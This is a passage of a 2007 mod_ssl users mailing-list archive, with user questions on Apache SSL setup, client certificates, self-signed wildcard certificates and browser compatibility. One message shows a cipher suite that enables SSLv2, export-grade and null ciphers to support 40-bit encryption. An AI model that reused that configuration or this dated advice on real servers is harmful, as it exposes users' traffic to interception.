525D514D9E6; Sat, 27 Oct 2007 00:34:53 +0200 (CEST) Delivered-To: modssl-users@modssl.org Received: from sklave3.rackland.de (sklave3.rackland.de [88.198.248.38]) by master.modssl.org (Postfix) with ESMTP id 395CE14D82E for ; Sat, 27 Oct 2007 00:34:51 +0200 (CEST) Received: by sklave3.rackland.de (Postfix, from userid 1000) id BC07C4B990; Sat, 27 Oct 2007 00:34:47 +0200 (CEST) Date: Sat, 27 Oct 2007 00:34:47 +0200 To: modssl-users@modssl.org Subject: Apache2.2-mod-ssl: No whitelisting of certificates? Message-ID: <20071026223447.GA6577@danisch.de> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.13 (2006-08-11) From: hadmut@danisch.de (Hadmut Danisch) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: hadmut@danisch.de (Hadmut Danisch) X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hi, just a question about the mod_ssl in Apache2.2: I am currently porting an application that makes use of client certificates from Apache1.3 to Apache2.2. Apache1.3 used a whitelisting mechanism, i.e. a certificate was accepted only if was listed in /etc/ssl/certs. In contrast, Apache2.2 does not seem to do any whitelisting, instead it checks a CRL file in /etc/ssl/revoke, i.e. does a blacklisting. Is there any chance to have whitelisting with Apache2.2 (except for self-programming)? regards Hadmut ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Oct 29 01:23:16 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id F3D0E14DA25; Mon, 29 Oct 2007 01:23:15 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.186]) by master.modssl.org (Postfix) with ESMTP id A374A14D85E for ; Mon, 29 Oct 2007 01:23:10 +0100 (CET) Received: by rv-out-0910.google.com with SMTP id k20so1403838rvb for ; Sun, 28 Oct 2007 17:23:05 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=jnVWkV2PEB/+jwdtmysdhSXjNEI9eISxqMSeNpluSTk=; b=UmUWEhAo1dc6d93OVtKfbCK3cBVARBnJBzpmKOXDHYHdPSb2G+TMq0+MLQKkX+VlfQ7fPDzozRE+ceJs/sNRWGYAVrvIjG/h6tMGOeKNN0SGwyu//Vmic+wiqyTZJ/Ov4wIIbuC3ccLKnpx7cuZ9ifPWLLAiXD8RsOpQkAr/e+E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=iJdKhI1oI35IoUotStWTqVBiwvwwkxZPc1DGaEAR5+sPL5of6gerraTNFsDayHP0s4rVIaK8J55wffZv7lfNXcv6C1xKYO1rXIj1a1SWLvYTJyvhZfGxWmQvGRUqdJwsEmG5k+ASaGNfk8nExVUABbkocuEWMXnAD6dJqPie0lA= Received: by 10.142.77.11 with SMTP id z11mr1169141wfa.1193617385896; Sun, 28 Oct 2007 17:23:05 -0700 (PDT) Received: by 10.142.240.15 with HTTP; Sun, 28 Oct 2007 17:23:05 -0700 (PDT) Message-ID: <8b33571b0710281723r26adee91w79844bd08ff47f91@mail.gmail.com> Date: Sun, 28 Oct 2007 21:23:05 -0300 From: "Patricio Andres Victoriano Fernandez" To: modssl-users@modssl.org Subject: Pedir un certificado especial. MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_9366_23043609.1193617385887" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Patricio Andres Victoriano Fernandez" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_9366_23043609.1193617385887 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Hola espero alguien hable espa=F1ol. Resulta que estoy configurando un servidor web apache con ssl, con certificados por parte del servidor y del cliente. Todo resulta y funciona. Ahora el problema es que no consigo que en algunos browser como Opera o Explorer, el certificado cliente funcione por defecto. Esto para que la pantalla en la que aparecen todos los certificados que el cliente posee no aparesca ya que a algunos usuarios inexpertos, les podria traer algunos problemas. Se que solo es selccionar el correcto y precionar [ENTER] pero necesito eliminar dicha pantalla. De antemano muchas gracias por leer el mail. ------=_Part_9366_23043609.1193617385887 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Hola espero alguien hable espa=F1ol.

Resulta que estoy configurando = un servidor web apache con ssl, con certificados por parte del servidor y d= el cliente.
Todo resulta y funciona.

Ahora el problema es que no = consigo que en algunos browser como Opera o Explorer, el certificado client= e funcione por defecto. Esto para que la pantalla en la que aparecen todos = los certificados que el cliente posee no aparesca ya que a algunos usuarios= inexpertos, les podria traer algunos problemas. Se que solo es selccionar = el correcto y precionar [ENTER] pero necesito eliminar dicha pantalla.

De antemano muchas gracias por leer el mail.
------=_Part_9366_23043609.1193617385887-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Nov 1 22:01:40 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 751C614DA28; Thu, 1 Nov 2007 22:01:40 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from amc.org.au (220-245-173-132-sa-pppoe.tpgi.com.au [220.245.173.132]) by master.modssl.org (Postfix) with SMTP id 5789914D83E for ; Thu, 1 Nov 2007 22:01:38 +0100 (CET) Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C81CCA.61C51D13" X-MimeOLE: Produced By Microsoft Exchange V6.5 Subject: Question on SSL for Apache 1.3.9 on Windows Date: Fri, 2 Nov 2007 08:01:34 +1100 Message-ID: <09F2FB481376364889D05649DB4B21B3EB4CA6@WENSLEYDALE.amc.org.au> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Question on SSL for Apache 1.3.9 on Windows Thread-Index: AcgcymKyB2aSznvVTzG47cyLPUbdRw== From: "Michael Driscoll" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Driscoll" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C81CCA.61C51D13 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I am running Apache 1.3.9 on Windows 2003 SP2 and need to install SSL. I am new to this so I was wondering if someone can help me? I am unable to find a precompiled version of mod-ssl. =20 Regards Michael ------_=_NextPart_001_01C81CCA.61C51D13 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

I am running Apache 1.3.9 on Windows 2003 SP2 and = need to install SSL. I am new to this so I was wondering if someone can help me? = I am unable to find a precompiled version of = mod-ssl.

 

Regards

Michael

------_=_NextPart_001_01C81CCA.61C51D13-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Nov 1 22:45:00 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 7141214DA28; Thu, 1 Nov 2007 22:45:00 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from web25407.mail.ukl.yahoo.com (web25407.mail.ukl.yahoo.com [217.12.10.141]) by master.modssl.org (Postfix) with SMTP id D403F14D83E for ; Thu, 1 Nov 2007 22:44:59 +0100 (CET) Received: (qmail 53174 invoked by uid 60001); 1 Nov 2007 21:44:55 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.co.uk; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=3XONSnZ29GeERG8lbc8r8hT27g10xy4UgmziJMpGuBeSzHUqc5TJ//fVlmUvTv0SpD4Q82903xI1SQ9WQEazM8O/8QSgfN+Qd2aotVmPdXmMPWT9mAZBSIo++jqIhLw988Eh5NTHv0H4RurTqld+pnDXdVHqDiSEQyDQws7LCIw=; X-YMail-OSG: t6NAw1cVM1k6pZfvMx04hCBTxARKmXXurAesiglHtE4pvPU75HBNjNn_4ACmpVs60lOJwvNm_TLrJ3.5y.gCVXAjg_IFIoqiQ0lab0yQpA.qW_vB Received: from [81.104.240.100] by web25407.mail.ukl.yahoo.com via HTTP; Thu, 01 Nov 2007 21:44:54 GMT Date: Thu, 1 Nov 2007 21:44:54 +0000 (GMT) From: Glyn Astill Subject: Re: Question on SSL for Apache 1.3.9 on Windows To: modssl-users@modssl.org In-Reply-To: <09F2FB481376364889D05649DB4B21B3EB4CA6@WENSLEYDALE.amc.org.au> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Message-ID: <959425.52552.qm@web25407.mail.ukl.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glyn Astill X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users get the src and compile or read: http://tud.at/programm/apache-ssl-win32-howto.php3 --- Michael Driscoll wrote: > I am running Apache 1.3.9 on Windows 2003 SP2 and need to install > SSL. I > am new to this so I was wondering if someone can help me? I am > unable to > find a precompiled version of mod-ssl. > > > > Regards > > Michael > > ___________________________________________________________ Yahoo! Answers - Got a question? Someone out there knows the answer. Try it now. http://uk.answers.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Nov 1 22:47:39 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 1514314DA28; Thu, 1 Nov 2007 22:47:39 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from amc.org.au (220-245-173-132-sa-pppoe.tpgi.com.au [220.245.173.132]) by master.modssl.org (Postfix) with SMTP id 9D86514D83E for ; Thu, 1 Nov 2007 22:47:36 +0100 (CET) Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-MimeOLE: Produced By Microsoft Exchange V6.5 Subject: RE: Question on SSL for Apache 1.3.9 on Windows Date: Fri, 2 Nov 2007 08:47:33 +1100 Message-ID: <09F2FB481376364889D05649DB4B21B3EB4CCB@WENSLEYDALE.amc.org.au> In-Reply-To: <959425.52552.qm@web25407.mail.ukl.yahoo.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Question on SSL for Apache 1.3.9 on Windows Thread-Index: Acgc0HXA9072O9crS96eeJv4PSk0iwAAD46w References: <09F2FB481376364889D05649DB4B21B3EB4CA6@WENSLEYDALE.amc.org.au> <959425.52552.qm@web25407.mail.ukl.yahoo.com> From: "Michael Driscoll" To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Driscoll" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Ive tried that but am unable to locate Apache_X-mod_ssl_Y-openssl_Z-WIN32[-i386].zip which is mentioned at step 2 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Glyn Astill Sent: Friday, 2 November 2007 8:45 AM To: modssl-users@modssl.org Subject: Re: Question on SSL for Apache 1.3.9 on Windows get the src and compile or read: http://tud.at/programm/apache-ssl-win32-howto.php3 --- Michael Driscoll wrote: > I am running Apache 1.3.9 on Windows 2003 SP2 and need to install > SSL. I > am new to this so I was wondering if someone can help me? I am > unable to > find a precompiled version of mod-ssl. >=20 > =20 >=20 > Regards >=20 > Michael >=20 >=20 ___________________________________________________________ Yahoo! Answers - Got a question? Someone out there knows the answer. Try it now. http://uk.answers.yahoo.com/=20 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 2 10:57:17 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 709AE14D9EA; Fri, 2 Nov 2007 10:57:17 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from fw.ykhm.cij.co.jp (fw.cij.co.jp [61.206.48.131]) by master.modssl.org (Postfix) with ESMTP id DCD2714D847 for ; Fri, 2 Nov 2007 10:57:16 +0100 (CET) Received: from fw.cij.co.jp (localhost [127.0.0.1]) by fw.ykhm.cij.co.jp (Postfix) with ESMTP id 763934DB07 for ; Fri, 2 Nov 2007 18:57:09 +0900 (JST) Received: from kauai.ykhm.cij.co.jp (kauai.ykhm.cij.co.jp [192.168.9.2]) by fw.cij.co.jp (Postfix) with ESMTP id 6EE9C4DB06 for ; Fri, 2 Nov 2007 18:57:09 +0900 (JST) Received: from [127.0.0.1] (tsunoda.itc.ykhm.cij.co.jp [192.168.1.123]) by kauai.ykhm.cij.co.jp (Postfix) with ESMTP id 48D374BF54; Fri, 2 Nov 2007 18:57:09 +0900 (JST) Date: Fri, 02 Nov 2007 19:01:14 +0900 From: nori To: modssl-users@modssl.org Subject: Question about authentication and session cache Message-Id: <20071102185949.AEDC.TSUNODA@vest.co.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.31 [ja] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: nori X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hello, I try the construction of the server which satisfied three following conditions. 1) Directory[dir01] performs access control using SSL mutual authentication. 2) Directory[dir02] using only SSL server authentication. 3) Using SSL session cache. Therefore I made it the following configuration file. SSLRequireSSL SSLVerifyClient require SSLRequireSSL I can't use SSL session cache when I accessed dir01 again, Because Re-negotiation occured. Next, When I set it as follows. SSL session cache became effective, but client certification became necessary for access to dir02. SSLVerifyClient require SSLRequireSSL SSLVerifyClient require SSLRequireSSL How should I have set it to satisfy a condition? Regards Nori ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 2 13:23:56 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 52E7714D9EA; Fri, 2 Nov 2007 13:23:56 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.178]) by master.modssl.org (Postfix) with ESMTP id 804B014D847 for ; Fri, 2 Nov 2007 13:23:55 +0100 (CET) Received: by py-out-1112.google.com with SMTP id a25so1539992pyi for ; Fri, 02 Nov 2007 05:23:48 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; bh=bjk0YbfnMeXh0XyITdNM3cGSWYOklI6LUpYNzF3y7Xo=; b=QR+vRZ21ZIwhZ1KmC8/4eJUY7iApQZJjlpxbTVrR+3931aTBEKQwWUYrCpN25Q34nPAhpfaWNK7vKynxya45wavU5KCcZ3ild0hHgDxb01cHG2W5W1JumoWtbOh2NlOZJZkKhRBTZn1l1hO7LVtPJrAE5l3vikb7+aFAR54eA7o= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=o3C2oAQpjbMM+slD0U75E5np51pA0XyMJpZugw1aaQuct/zPe/0chervoDAAOtL9ML4BSsWiITDNa9ILckuJ9yb//E6PfX6mD7tdiTcHU3JNj0B2Yh6uT9GlsGg3ngaibOmlozdj/17CLEusowu3TaOuXk0KIO1OYi1TcQnvWHA= Received: by 10.65.211.16 with SMTP id n16mr6265134qbq.1194006228466; Fri, 02 Nov 2007 05:23:48 -0700 (PDT) Received: by 10.64.251.5 with HTTP; Fri, 2 Nov 2007 05:23:48 -0700 (PDT) Message-ID: <62b856460711020523g74740627o1bcbb8871c834197@mail.gmail.com> Date: Fri, 2 Nov 2007 13:23:48 +0100 From: "Michael Grant" To: modssl-users@modssl.org Subject: self-signed wild card certs and mozilla MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Google-Sender-Auth: 18dcdc970a17ed43 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Grant" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users I would like to make a self-signed wild card cert and install the cert in my browser so that I don't get any scary warnings from the browser. I created a self-signed wild card cert as follows: # openssl req -new -x509 -nodes -out networkguild.org.crt -keyout networkguild.org.key -days 1826 -subj "/C=US/ST=MD/O=Network Guild/CN=*.networkguild.org/emailAddress=mg-webmaster@networkguild.org/" I then extracted the der form and stored it in a second .crt file: openssl x509 -inform PEM -outform DER -in networkguild.org.crt -out files/networkguild.org.crt I then simply pointed Mozilla at this file which is here: http://networkguild.org/sites/networkguild.org/files/networkguild.org.crt Mozilla dutifully offers to install the certificate without complaint. Unfortunately, when I access https://www.networkguild.org, it complains with the following error: Website Certified by an Unknown Authority Although it does give me the choice of accepting forever, but I shouldn't have to do this. When I click to accept here, I then get the next scary message: You have attempted to establish a connection with "networkguild.org". However, the security certificate presented belongs to "*.networkguild.org". It is possible, though unlikely, that someone may be trying to intercept your communications with this web site. However, and this was totally unexpected, IE doesn't complain at all. It found the certificate that I installed using Mozilla. Did I create my self-signed wild card cert properly? I must have done something partially correct for IE to accept it without warnings or errors. Michael Grant ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 2 15:38:30 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id C192314D9EA; Fri, 2 Nov 2007 15:38:30 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mail.nrlssc.navy.mil (mail1.nrlssc.navy.mil [128.160.35.1]) by master.modssl.org (Postfix) with ESMTP id 2D15A14D847 for ; Fri, 2 Nov 2007 15:38:29 +0100 (CET) Received: from ng-mail.nrlssc.navy.mil (localhost [127.0.0.1]) by mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id lA2EcObj017160 for ; Fri, 2 Nov 2007 09:38:24 -0500 Received: from [128.160.115.202] (kali.nrlssc.navy.mil [128.160.115.202]) by ng-mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id lA2EcZM6016943 for ; Fri, 2 Nov 2007 09:38:35 -0500 Message-ID: <472B3659.90900@nrlssc.navy.mil> Date: Fri, 02 Nov 2007 09:38:17 -0500 From: "Roy Keene (Contractor)" Organization: Naval Research Laboratory User-Agent: Thunderbird 2.0.0.6 (X11/20070728) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Question on SSL for Apache 1.3.9 on Windows References: <959425.52552.qm@web25407.mail.ukl.yahoo.com> In-Reply-To: <959425.52552.qm@web25407.mail.ukl.yahoo.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-TM-AS-Product-Ver: : ISVW-6.0.0.2339-5.0.0.1023-15336001 X-TM-AS-Result: : Yes--16.005600-0-31-1 X-TM-AS-Category-Info: : 31:0.000000 X-TM-AS-MatchedID: : =?us-ascii?B?MTQ2MDA4LTE1MDU2Ny03MDAw?= =?us-ascii?B?NzUtMTM5MDEwLTcwMTU3Ni0xMzk3MDQtNzAwNTM4LTEyMTM1Mi03?= =?us-ascii?B?MDA5ODMtMTg3MDY3LTcwMDA1NS03MDE3NDktNzA0NDI1LTcwNDQz?= =?us-ascii?B?MC03MDA0NjktNzAxMDUzLTcwMjUxMy03MDY0MzMtNzAxMjc2LTcw?= =?us-ascii?B?OTU4NC03MDY1NjQtMTg4MTQyLTEyMTUyMy03MDgxOTYtNzAwNzU2?= =?us-ascii?B?LTcwMTI0OS03MDY3MjYtNzA0ODIwLTcwMTIwMi0xODgyMDEtNzAy?= =?us-ascii?B?MTMxLTcwMTYwNC03MDcxNTEtNzA0NzUxLTcwMDA3Ny0xNDgwMzkt?= =?us-ascii?B?MTQ4MDUxLTIwMDQzLTE1OTA3?= Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Roy Keene (Contractor)" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Glyn Astill wrote: > get the src and compile or read: > > http://tud.at/programm/apache-ssl-win32-howto.php3 > > --- Michael Driscoll wrote: > >> I am running Apache 1.3.9 on Windows 2003 SP2 and need to install >> SSL. I >> am new to this so I was wondering if someone can help me? I am >> unable to >> find a precompiled version of mod-ssl. >> >> >> >> Regards >> >> Michael >> >> > > > > ___________________________________________________________ > Yahoo! Answers - Got a question? Someone out there knows the answer. Try it > now. > http://uk.answers.yahoo.com/ > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Also, Apache 1.3.9 is very old and probably shouldn't be used. Apache version 1.3.39 is the latest. -- Roy Keene (Contractor) Office of Network Management (Code 7030.8) Naval Research Laboratory Stennis Space Center, MS 39529 DSN 828-4827 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 9 18:54:20 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 24F0614DA4D; Fri, 9 Nov 2007 18:54:20 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mail3.hughessupply.com (mail3.hughessupply.com [65.248.165.226]) by master.modssl.org (Postfix) with ESMTP id 8AF9214D865 for ; Fri, 9 Nov 2007 18:54:18 +0100 (CET) Received: from HSIEML02.hsi.hughessupply.com ([11.224.31.229]) by mail3.hughessupply.com with Microsoft SMTPSVC(6.0.3790.1830); Fri, 9 Nov 2007 12:32:11 -0500 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C822F6.75EA1B09" Subject: lowering apache ssl encryption to 40bit Date: Fri, 9 Nov 2007 12:32:10 -0500 Message-ID: <5F6BF7F75AD1F948B7F4E3588A41993201490D19@HSIEML02.hsi.hughessupply.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: lowering apache ssl encryption to 40bit Thread-Index: Acgi9nV4TUikzlHERmSGutfqDMIKXg== From: "Reneau, Wes W [HDS]" To: X-OriginalArrivalTime: 09 Nov 2007 17:32:11.0497 (UTC) FILETIME=[75DFF590:01C822F6] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Reneau, Wes W [HDS]" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C822F6.75EA1B09 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable I have a legacy app that cannot (at present) be upgraded to 128 bit encryption. In order to alleviate this problem I've gotten a reverse proxy running. My present setup is as follows: =20 Ubuntu 6.0.6 LTS Apache 2.0.55 Libapache2-mod-proxy-html 2.4.3-2 Openssl 0.9.8a =20 My problem is that I can use most any website to have apache reverse proxy for me successfully. Is it possible to step down on the encryption on the "backside" of the apache connection to the legacy server? =20 At present I have the following in my vhost file: =20 SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL =20 This, as I understand it, allows apache on the front end to allow lower level of encryption, however, as stated earlier I need the request FROM apache to the legacy server to be 40 bit. =20 Thanks =20 W Reneau ------_=_NextPart_001_01C822F6.75EA1B09 Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable

I have a legacy app that cannot (at present) be = upgraded to 128 bit encryption.  In order to alleviate this problem I’ve = gotten a reverse proxy running.  My present setup is as = follows:

 

Ubuntu 6.0.6 LTS

Apache 2.0.55

Libapache2-mod-proxy-html = 2.4.3-2

Openssl 0.9.8a

 

My problem is that I can use most any website to have = apache reverse proxy for me successfully.  Is it possible to step down on = the encryption on the “backside” of the apache connection to the legacy = server?

 

At present I have the following in my vhost = file:

 

SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL<= /font>

 

This, as I understand it, allows apache on the front = end to allow lower level of encryption, however, as stated earlier I need the = request FROM apache to the legacy server to be 40 = bit.

 

Thanks

 

W = Reneau

------_=_NextPart_001_01C822F6.75EA1B09-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Nov 9 19:32:33 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 082EA14D9F5; Fri, 9 Nov 2007 19:32:32 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from nlpi025.prodigy.net (nlpi025.sbcis.sbc.com [207.115.36.54]) by master.modssl.org (Postfix) with ESMTP id F055614D865 for ; Fri, 9 Nov 2007 19:32:31 +0100 (CET) Received: from mail.adams-r-us.name (adsl-66-142-236-48.dsl.hstntx.swbell.net [66.142.236.48]) (authenticated bits=0) by nlpi025.prodigy.net (8.13.8 smtpauth/dk/8.13.8) with ESMTP id lA9IWPWZ011907 for ; Fri, 9 Nov 2007 12:32:25 -0600 Received: from localhost (localhost.adams-r-us.name [127.0.0.1]) by mail.adams-r-us.name (Postfix) with ESMTP id 6EA7556FA3 for ; Fri, 9 Nov 2007 12:32:20 -0600 (CST) X-Virus-Scanned: amavisd-new at X-Spam-Flag: NO X-Spam-Score: -4.196 X-Spam-Level: X-Spam-Status: No, score=-4.196 tagged_above=-10 required=5.6 tests=[ALL_TRUSTED=-1.8, AWL=0.203, BAYES_00=-2.599] Received: from mail.adams-r-us.name ([127.0.0.1]) by localhost (mail.adams-r-us.name [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 8nOKIW3DGpsg for ; Fri, 9 Nov 2007 12:32:17 -0600 (CST) Received: from mail.adams-r-us.name (asok.adams-r-us.name [192.168.0.202]) by mail.adams-r-us.name (Postfix) with ESMTP id 20FE656FA2 for ; Fri, 9 Nov 2007 12:32:17 -0600 (CST) Date: Fri, 9 Nov 2007 12:32:16 -0600 (CST) From: Rob Adams To: modssl-users@modssl.org Message-ID: <3968441.281194633136950.JavaMail.root@asok> Subject: IE Woes MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Originating-IP: [198.176.247.51] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rob Adams X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This problem may have been addressed before, but I am trying to get IE 6+ browsers to with my SSL website. I am currently running the following versions: Apache 1.3.39 mod_ssl 2.8.29 mod_perl 1.30 ApacheJServ 1.1.2 (Yes, I know old) OpenSSL 0.9.8b The problem is that IE gives me a page cannot be displayed error when I try to access the site. This is not a problem in Firefox. I have watched the ssl_engine_log and can see the IE client make the connection and complete the SSL handshake. However, after that nothing appears in the https access log. I know for a fact that IE is not making it past the handshake. To make sure this wasn't and Apache issue, I ran the site on port 80 and it works fine. I have added the SetEnv line from the Howto section, but does anyone else have any ideas or suggestions? Robert Adams ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Nov 14 08:33:28 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 2FD8114D9EA; Wed, 14 Nov 2007 08:33:28 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rnbm-smt02.mck.co.za (rnbm-smt02.mck.co.za [196.25.48.66]) by master.modssl.org (Postfix) with ESMTP id 5877814D82E for ; Wed, 14 Nov 2007 08:33:21 +0100 (CET) Received: from RNBM-MSG08.mca.naspers.dom (Not Verified[172.31.200.160]) by rnbm-smt02.mck.co.za with MailMarshal (v6,2,0,2977) id ; Wed, 14 Nov 2007 09:33:12 +0200 Received: from rnbm-msg09.mca.naspers.dom ([10.17.131.12]) by 